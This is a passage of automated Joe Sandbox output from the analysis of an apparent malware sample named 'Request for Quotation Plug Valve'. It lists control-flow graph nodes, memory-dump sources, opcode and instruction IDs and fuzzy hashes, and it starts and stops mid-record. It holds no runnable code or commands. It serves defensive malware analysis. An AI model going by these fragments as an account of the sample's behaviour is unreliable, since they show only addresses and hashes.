2ab73cb-2ab73d3 3281->3284 3285 2ab73ee-2ab740d call 2ab76f1 3282->3285 3286 2ab73e6-2ab73ec 3282->3286 3284->3234 3287 2ab73d9-2ab73de 3284->3287 3289 2ab7413-2ab7417 3285->3289 3286->3285 3286->3289 3287->3223 3289->3223 3290 2ab7419-2ab7435 3289->3290 3290->3223 3292->3268
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 05a78bb0492955a9b1468ac7373f90297980167a10ad8fda1be2faa2cb20a76c
                                                                                      • Instruction ID: b700c5f57301443992cb2008316fbb7755f03c49ec4592efa527d2e03c8f4d8a
                                                                                      • Opcode Fuzzy Hash: 05a78bb0492955a9b1468ac7373f90297980167a10ad8fda1be2faa2cb20a76c
                                                                                      • Instruction Fuzzy Hash: 95E14F32A00115DFCB16CFA9CD84AEDFBB6BF88305F558165E805AB266DB70ED41CB50

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3294 68e2968-68e2988 3295 68e298f-68e2a20 3294->3295 3296 68e298a 3294->3296 3300 68e2a26-68e2a36 3295->3300 3301 68e2d72-68e2da4 3295->3301 3296->3295 3349 68e2a39 call 68e310e 3300->3349 3350 68e2a39 call 68e2dbf 3300->3350 3351 68e2a39 call 68e2dc8 3300->3351 3304 68e2a3f-68e2a4e 3352 68e2a50 call 68e992c 3304->3352 3353 68e2a50 call 68e9548 3304->3353 3354 68e2a50 call 68e9328 3304->3354 3305 68e2a56-68e2a72 3307 68e2a79-68e2a82 3305->3307 3308 68e2a74 3305->3308 3309 68e2d65-68e2d6b 3307->3309 3308->3307 3310 68e2a87-68e2b01 3309->3310 3311 68e2d71 3309->3311 3316 68e2bbd-68e2c18 3310->3316 3317 68e2b07-68e2b75 3310->3317 3311->3301 3326 68e2c19-68e2c67 3316->3326 3327 68e2bb8-68e2bbb 3317->3327 3328 68e2b77-68e2bb7 3317->3328 3333 68e2c6d-68e2d4f 3326->3333 3334 68e2d50-68e2d5b 3326->3334 3327->3326 3328->3327 3333->3334 3336 68e2d5d 3334->3336 3337 68e2d62 3334->3337 3336->3337 3337->3309 3349->3304 3350->3304 3351->3304 3352->3305 3353->3305 3354->3305
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c6b9e5988c63e9fb70fc1d1ec98df361e97851f3e47921b55bf7cf718a4c0924
                                                                                      • Instruction ID: 02441e370b8d1fb3318077bc886921a2fdd8d84025cdcc7bd26eaf78846beae2
                                                                                      • Opcode Fuzzy Hash: c6b9e5988c63e9fb70fc1d1ec98df361e97851f3e47921b55bf7cf718a4c0924
                                                                                      • Instruction Fuzzy Hash: 71C1B078E01218CFEB54DFA5D994B9DBBB2BF89300F1090A9D809AB355DB359E81CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4a2fcbfcf71cc7d0510f3ce9b25c5f7eb3164f54e8024abdccff4faae11dd14a
                                                                                      • Instruction ID: 845951ca28afec5f8be4a66852891bd3fc5367299a7c1ec4c0d3168da4da36fb
                                                                                      • Opcode Fuzzy Hash: 4a2fcbfcf71cc7d0510f3ce9b25c5f7eb3164f54e8024abdccff4faae11dd14a
                                                                                      • Instruction Fuzzy Hash: EAA1A174E01228CFEB68CF6AC954B9DFBF2BB89300F14C1AAD408A7254DB745A85CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5d2bc70b3d90f1d220cf2f76e584ce5c55ab4e27d1194d75c45c5a08b9505454
                                                                                      • Instruction ID: 1430f98945b2d51c9fefd808d0e081652a8e1ee49266caba661b826aafb62f01
                                                                                      • Opcode Fuzzy Hash: 5d2bc70b3d90f1d220cf2f76e584ce5c55ab4e27d1194d75c45c5a08b9505454
                                                                                      • Instruction Fuzzy Hash: EBA12474D00208CFEB24DFA9C858BDDBBB1FF89314F209269E508A72A1DB759985CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0fdbfcf25e5a01659b2bd8e01ebe3a11f53b0c84e36e5a94811693f869c045cd
                                                                                      • Instruction ID: e92ce37615805e21f0893f891abd9cdf786b7d37addc104f0166b72b10187f84
                                                                                      • Opcode Fuzzy Hash: 0fdbfcf25e5a01659b2bd8e01ebe3a11f53b0c84e36e5a94811693f869c045cd
                                                                                      • Instruction Fuzzy Hash: DCA1A174E012298FEB68DF6AC944B9DFBF2BF89300F14C1AAD448A7254DB745A85CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1af0a04436bdefca7e28456bcae3000ba21d1269d822d85654ee08e78410ccfe
                                                                                      • Instruction ID: b0cfdba552c12d50569cbd0439c83c5499a9303bd00e6f75d460d85812897205
                                                                                      • Opcode Fuzzy Hash: 1af0a04436bdefca7e28456bcae3000ba21d1269d822d85654ee08e78410ccfe
                                                                                      • Instruction Fuzzy Hash: F2A11474D00208CFEB14DFA9C994BEDBBB1FF89304F209269E509A72A1DB759985CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2f014f58dac73795a53c39b88573cd41bfe165e08b0774639c432fa8019d4d5e
                                                                                      • Instruction ID: 52c6c5c27a1adfcd8e9f1827a4b8e439d22535c052e1c6d3c938417e3a90bc9c
                                                                                      • Opcode Fuzzy Hash: 2f014f58dac73795a53c39b88573cd41bfe165e08b0774639c432fa8019d4d5e
                                                                                      • Instruction Fuzzy Hash: 6F910374D00218CFEB50DFA8C898BECBBB1FF49314F209269E509AB291DB759985CF10
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6870ea2472584819292406ffaeebfb0de19ad473a57afcf32b612d64ceb84606
                                                                                      • Instruction ID: 0dbbfed14e00b983590529d838964cc10757706321208f95787aa6e189efaeeb
                                                                                      • Opcode Fuzzy Hash: 6870ea2472584819292406ffaeebfb0de19ad473a57afcf32b612d64ceb84606
                                                                                      • Instruction Fuzzy Hash: 1191F474E00218CFDB19DFAAD984ADDBBF2BF89300F548169D418AB365DB709981CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 98ca3a31a9b2f370a357b78d0559e64397118ae1edb5101dc464bd6524d5ae1f
                                                                                      • Instruction ID: 768f2ed500511c72921602873b44457448678c9ffce8248b02554b0682501fc1
                                                                                      • Opcode Fuzzy Hash: 98ca3a31a9b2f370a357b78d0559e64397118ae1edb5101dc464bd6524d5ae1f
                                                                                      • Instruction Fuzzy Hash: 1081D374E00218CFDB19DFA9D994B9DBBF2BF88310F14916AE418AB365DB709981CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 78cec79cec334a92b7ff2ba41813256285694d9e779ae891976b71a4582028ce
                                                                                      • Instruction ID: 2f7d05eb3df11f79a7ff8cc8c18253da17911559cc38211b50dc022098d59cf6
                                                                                      • Opcode Fuzzy Hash: 78cec79cec334a92b7ff2ba41813256285694d9e779ae891976b71a4582028ce
                                                                                      • Instruction Fuzzy Hash: A681E574E00218DFDB19DFAAD884A9DBBF6BF89310F14C06AD418AB365DB309981CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f6e2a9f7c61a32fe63d8847f627d6772ffa1cd1286ba56f4571499d0a84954e0
                                                                                      • Instruction ID: 0c74c1040bb59de45e1969bbb1dd43f449e6014e9cb1cbdaa465132ae5c003c4
                                                                                      • Opcode Fuzzy Hash: f6e2a9f7c61a32fe63d8847f627d6772ffa1cd1286ba56f4571499d0a84954e0
                                                                                      • Instruction Fuzzy Hash: 8081D574E00618CFDB19DFAAD984A9DBBF6BF88300F14C069D419AB365DB309981CF10
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c1b50cb8eaef8ceaed17149742f42c7c5be060856b46db9a9d56d8db9fc50ab5
                                                                                      • Instruction ID: 2b5a31fcdc7c9c9b72d104f266a1a5725d1dba024326bbe533a1d0650c2cefe1
                                                                                      • Opcode Fuzzy Hash: c1b50cb8eaef8ceaed17149742f42c7c5be060856b46db9a9d56d8db9fc50ab5
                                                                                      • Instruction Fuzzy Hash: 7881D774E00218CFDB15DFA9D984A9DFBF6BF89310F14806AE419AB365DB709981CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2a8cc4c46bae99eb9400410bf1e3de51b56f8a110f90bad1e64eb4dcc019abfe
                                                                                      • Instruction ID: b8005e17706d653124046f18f449971f881d2bc617d546fda99d18c3e44715ab
                                                                                      • Opcode Fuzzy Hash: 2a8cc4c46bae99eb9400410bf1e3de51b56f8a110f90bad1e64eb4dcc019abfe
                                                                                      • Instruction Fuzzy Hash: A781B574E00218CFEB59DFAAD984B9DBBF6BF88310F14806AD419AB365DB709941CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 71aacc8aaabaeb10d810592d3fcfe5b3adeb5f2858323efef63913558f633591
                                                                                      • Instruction ID: 3ed47d3d8f097aab77ed9b57c1d5de8f7e8b3725d6fccfa06590b25bb31ea9b9
                                                                                      • Opcode Fuzzy Hash: 71aacc8aaabaeb10d810592d3fcfe5b3adeb5f2858323efef63913558f633591
                                                                                      • Instruction Fuzzy Hash: 7E81D574E00218DFDB19DFA9D984A9DBBF2BF88314F14C06AE419AB365DB705981CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4ee80d4d345a120c0e5ecaea56ad878c79b28b17bb13cb6df250608bb25001ca
                                                                                      • Instruction ID: 47f81e4fa744799553a5024e71d0357fbd5808dbcd2dddc8d3c2660a7d31f033
                                                                                      • Opcode Fuzzy Hash: 4ee80d4d345a120c0e5ecaea56ad878c79b28b17bb13cb6df250608bb25001ca
                                                                                      • Instruction Fuzzy Hash: 1181E574E00658CFDB59DFAAD984B9DBBF6BF88300F148069E419AB365DB309985CF10
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6449688428ace0dd9dee89b7b5b8fe6b6c675bdadb1076d8d0ad7def7355a70d
                                                                                      • Instruction ID: d9f89c3ce548f882551000823a392a50d32c38852470b01c673dfeaf802bef71
                                                                                      • Opcode Fuzzy Hash: 6449688428ace0dd9dee89b7b5b8fe6b6c675bdadb1076d8d0ad7def7355a70d
                                                                                      • Instruction Fuzzy Hash: DE71C175E01228CFDB68DF6AC9847DDBBB2BF89301F1495AAD409A7254DB345A81CF40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a6e0f8b3b1f94868e6f736519179978e2ce9fff065077bf26581c2a2e0fb80b
                                                                                      • Instruction ID: 52a4a6da2cb8ab18d04588b94b9826ec2bbfed4acec7c3d064304b3144409029
                                                                                      • Opcode Fuzzy Hash: 1a6e0f8b3b1f94868e6f736519179978e2ce9fff065077bf26581c2a2e0fb80b
                                                                                      • Instruction Fuzzy Hash: 85719475E016298FEB68CF6AC944B9DFBF2BF89300F14C1A9D548A7254DB744A85CF10
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 30caf294daefe25c9ee16d4178c70715e1accc18ed4be3814564212a20019e55
                                                                                      • Instruction ID: 29642248b23652621cf5e6482710868abe5468ab8f18ea07999d69bb338e1c9c
                                                                                      • Opcode Fuzzy Hash: 30caf294daefe25c9ee16d4178c70715e1accc18ed4be3814564212a20019e55
                                                                                      • Instruction Fuzzy Hash: 0851A474E00208DFEB19DFBAD994A9DBBF6BF89300F249129E815AB365DB705941CF10
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ab304c9f21dff4b27a2348096c71aa6c4e6bd5ff6c0029a7ec9dfa306239fa58
                                                                                      • Instruction ID: c8d23f4958edb5b46344bdef7f8707073b4077d9d866e316fa86e9de9f61fd90
                                                                                      • Opcode Fuzzy Hash: ab304c9f21dff4b27a2348096c71aa6c4e6bd5ff6c0029a7ec9dfa306239fa58
                                                                                      • Instruction Fuzzy Hash: B451A474E00208DFEB19DFBAD994A9DBBB6BF89300F249029E815AB365DB705941CF14
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 551f94f4a0c86042c422b7d73816cad88cad3c7e315a094763390e6630fcd6a0
                                                                                      • Instruction ID: 26f81a8d415a6654501748f4c4120503c2c6bbb3d811595f05bddb0fd3d90f33
                                                                                      • Opcode Fuzzy Hash: 551f94f4a0c86042c422b7d73816cad88cad3c7e315a094763390e6630fcd6a0
                                                                                      • Instruction Fuzzy Hash: 1A417871E016188BEB68CF6BD95478EFAF3AFC9204F14C1AAC40CA6254EB740A858F51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b6133d55b7ebf28a6ad9f788f3e88afec407b137a3f43f4f68ab91b13eda0ad2
                                                                                      • Instruction ID: e284268e373d7d2e06883612ea844e07fe595a4d60ba3b20d2cbfe260d152083
                                                                                      • Opcode Fuzzy Hash: b6133d55b7ebf28a6ad9f788f3e88afec407b137a3f43f4f68ab91b13eda0ad2
                                                                                      • Instruction Fuzzy Hash: 66410475E01248CBEB58DFAAD8547ADFBB2BF89300F24D12AD415A7258DB344A45CF40

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1062 68e992c 1063 68e99eb-68e99fc 1062->1063 1064 68e99fe 1063->1064 1065 68e9a03-68e9a0c 1063->1065 1064->1065 1067 68e9a12-68e9a25 1065->1067 1068 68e97e3-68e9808 1065->1068 1071 68e9a2c-68e9a47 1067->1071 1072 68e9a27 1067->1072 1069 68e980f-68e9846 1068->1069 1070 68e980a 1068->1070 1080 68e984d-68e987f 1069->1080 1081 68e9848 1069->1081 1070->1069 1073 68e9a4e-68e9a62 1071->1073 1074 68e9a49 1071->1074 1072->1071 1078 68e9a69-68e9a7f LdrInitializeThunk 1073->1078 1079 68e9a64 1073->1079 1074->1073 1082 68e9a81-68e9b7e 1078->1082 1079->1078 1087 68e98e3-68e98f6 1080->1087 1088 68e9881-68e98a6 1080->1088 1081->1080 1085 68e9b86-68e9b90 1082->1085 1086 68e9b80-68e9b85 1082->1086 1086->1085 1089 68e98fd-68e9922 1087->1089 1090 68e98f8 1087->1090 1091 68e98ad-68e98db 1088->1091 1092 68e98a8 1088->1092 1096 68e9924-68e9925 1089->1096 1097 68e9931-68e9969 1089->1097 1090->1089 1091->1087 1092->1091 1096->1067 1098 68e996b 1097->1098 1099 68e9970-68e99d1 call 68e9328 1097->1099 1098->1099 1105 68e99d8-68e99ea 1099->1105 1106 68e99d3 1099->1106 1105->1063 1106->1105
                                                                                      APIs
                                                                                      • LdrInitializeThunk.NTDLL(00000000), ref: 068E9A6E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 17c853886d7d52726a145e7ee51fb8126785f02edb43582fceeeef77fe8ff516
                                                                                      • Instruction ID: 6356ea26958d8be4c212263fc065470b54d304964bbd6ffd11287498696d7f2f
                                                                                      • Opcode Fuzzy Hash: 17c853886d7d52726a145e7ee51fb8126785f02edb43582fceeeef77fe8ff516
                                                                                      • Instruction Fuzzy Hash: AA115974E402198FEF44DBA8D884AADBBB5BF89314F148265E844E7255DBB0D942CB50

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1707 2abe007-2abe022 1709 2abe029-2abe02a call 2abe8e8 1707->1709 1710 2abe024 1707->1710 1711 2abe030-2abe099 1709->1711 1710->1709 1727 2abe0a0-2abe0a7 call 2abf3f1 1711->1727 2032 2abe0a8 call 68e0b20 1727->2032 2033 2abe0a8 call 68e0b30 1727->2033 1729 2abe0ae 2034 2abe0af call 68e178f 1729->2034 2035 2abe0af call 68e17a0 1729->2035 1730 2abe0b5 2036 2abe0b6 call 68e1e80 1730->2036 2037 2abe0b6 call 68e1e70 1730->2037 1731 2abe0bc 2038 2abe0bd call 68e295b 1731->2038 2039 2abe0bd call 68e2968 1731->2039 1732 2abe0c3-2abe0d1 1735 2abe0d8 1732->1735 1736 2abe0df 1735->1736 1737 2abe0e6-2abe0ed 1736->1737 1739 2abe0f4-2abe0fb 1737->1739 1741 2abe102-2abe110 1739->1741 1744 2abe117-2abe11e 1741->1744 1746 2abe125-2abe12c 1744->1746 1748 2abe133-2abe13a 1746->1748 1750 2abe141-2abe148 1748->1750 1752 2abe14f 1750->1752 1753 2abe156 1752->1753 1754 2abe15d 1753->1754 1755 2abe164 1754->1755 1756 2abe16b-2abe179 1755->1756 1759 2abe180-2abe187 1756->1759 1761 2abe18e-2abe195 1759->1761 1763 2abe19c 1761->1763 1764 2abe1a3 1763->1764 1765 2abe1aa-2abe1b1 1764->1765 1767 2abe1b8-2abe1bf 1765->1767 1769 2abe1c6 1767->1769 1770 2abe1cd-2abe1db 1769->1770 1773 2abe1e2-2abe1e9 1770->1773 1775 2abe1f0-2abe1f7 1773->1775 1777 2abe1fe-2abe205 1775->1777 1779 2abe20c 1777->1779 1780 2abe213 1779->1780 1781 2abe21a-2abe221 1780->1781 1783 2abe228-2abe236 1781->1783 1786 2abe23d 1783->1786 1787 2abe244-2abe24b 1786->1787 1789 2abe252-2abe259 1787->1789 1791 2abe260 1789->1791 1792 2abe267 1791->1792 1793 2abe26e-2abe27c 1792->1793 1796 2abe283 1793->1796 1797 2abe28a-2abe291 1796->1797 1799 2abe298 1797->1799 1800 2abe29f 1799->1800 1801 2abe2a6 1800->1801 1802 2abe2ad 1801->1802 1803 2abe2b4 1802->1803 1804 2abe2bb-2abe2c2 1803->1804 1806 2abe2c9 1804->1806 1807 2abe2d0-2abe2d7 1806->1807 1809 2abe2de-2abe2f3 1807->1809 1813 2abe2fa-2abe301 1809->1813 1815 2abe308-2abe30f 1813->1815 1817 2abe316-2abe31d 1815->1817 1819 2abe324 1817->1819 1820 2abe32b-2abe332 1819->1820 1822 2abe339 1820->1822 1823 2abe340 1822->1823 1824 2abe347 1823->1824 1825 2abe34e 1824->1825 1826 2abe355-2abe35c 1825->1826 1828 2abe363 1826->1828 1829 2abe36a 1828->1829 1830 2abe371-2abe37f 1829->1830 1833 2abe386 1830->1833 1834 2abe38d-2abe394 1833->1834 1836 2abe39b 1834->1836 1837 2abe3a2 1836->1837 1838 2abe3a9-2abe3b7 1837->1838 1841 2abe3be-2abe3c5 1838->1841 1843 2abe3cc-2abe3d3 1841->1843 1845 2abe3da 1843->1845 1846 2abe3e1-2abe3fd 1845->1846 1851 2abe404-2abe419 1846->1851 1855 2abe420 1851->1855 1856 2abe427-2abe4f9 1855->1856 1887 2abe500-2abe507 1856->1887 1889 2abe50e-2abe523 1887->1889 1893 2abe52a 1889->1893 1894 2abe531-2abe538 1893->1894 1896 2abe53f 1894->1896 1897 2abe546-2abe60a 1896->1897 1926 2abe611-2abe618 1897->1926 1928 2abe61f-2abe62d 1926->1928 1931 2abe634 1928->1931 1932 2abe63b 1931->1932 1933 2abe642 1932->1933 1934 2abe649-2abe6d5 1933->1934 1955 2abe6dc 1934->1955 1956 2abe6e3-2abe71b 1955->1956 1965 2abe722-2abe729 1956->1965 1967 2abe730-2abe73e 1965->1967 1970 2abe745 1967->1970 1971 2abe74c-2abe753 1970->1971 1973 2abe75a 1971->1973 1974 2abe761-2abe82c 1973->1974 2004 2abe833 1974->2004 2005 2abe83a-2abe848 2004->2005 2008 2abe84f 2005->2008 2009 2abe856 2008->2009 2010 2abe85d-2abe86b 2009->2010 2013 2abe872-2abe879 2010->2013 2015 2abe880-2abe8aa 2013->2015 2022 2abe8b1-2abe8cd 2015->2022 2027 2abe8d4-2abe8db 2022->2027 2029 2abe8e2-2abe8e5 2027->2029 2032->1729 2033->1729 2034->1730 2035->1730 2036->1731 2037->1731 2038->1732 2039->1732
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0800e05ba4916d4a7b99d4cba9838f4699ec9010fbe0ff878db961be4a24c079
                                                                                      • Instruction ID: 3af96f7823d888bd81e1a900793e7af58b8194d352587e9d8ccfd07fbeaf5fe3
                                                                                      • Opcode Fuzzy Hash: 0800e05ba4916d4a7b99d4cba9838f4699ec9010fbe0ff878db961be4a24c079
                                                                                      • Instruction Fuzzy Hash: 3512AA350312568FB6643B22E2AE16ABF69FB0F323704BE11F11AC01859FB544DACF61

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2040 2abe018-2abe022 2041 2abe029-2abe0a7 call 2abe8e8 call 2abf3f1 2040->2041 2042 2abe024 2040->2042 2364 2abe0a8 call 68e0b20 2041->2364 2365 2abe0a8 call 68e0b30 2041->2365 2042->2041 2061 2abe0ae 2366 2abe0af call 68e178f 2061->2366 2367 2abe0af call 68e17a0 2061->2367 2062 2abe0b5 2368 2abe0b6 call 68e1e80 2062->2368 2369 2abe0b6 call 68e1e70 2062->2369 2063 2abe0bc 2370 2abe0bd call 68e295b 2063->2370 2371 2abe0bd call 68e2968 2063->2371 2064 2abe0c3-2abe8db 2361 2abe8e2-2abe8e5 2064->2361 2364->2061 2365->2061 2366->2062 2367->2062 2368->2063 2369->2063 2370->2064 2371->2064
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
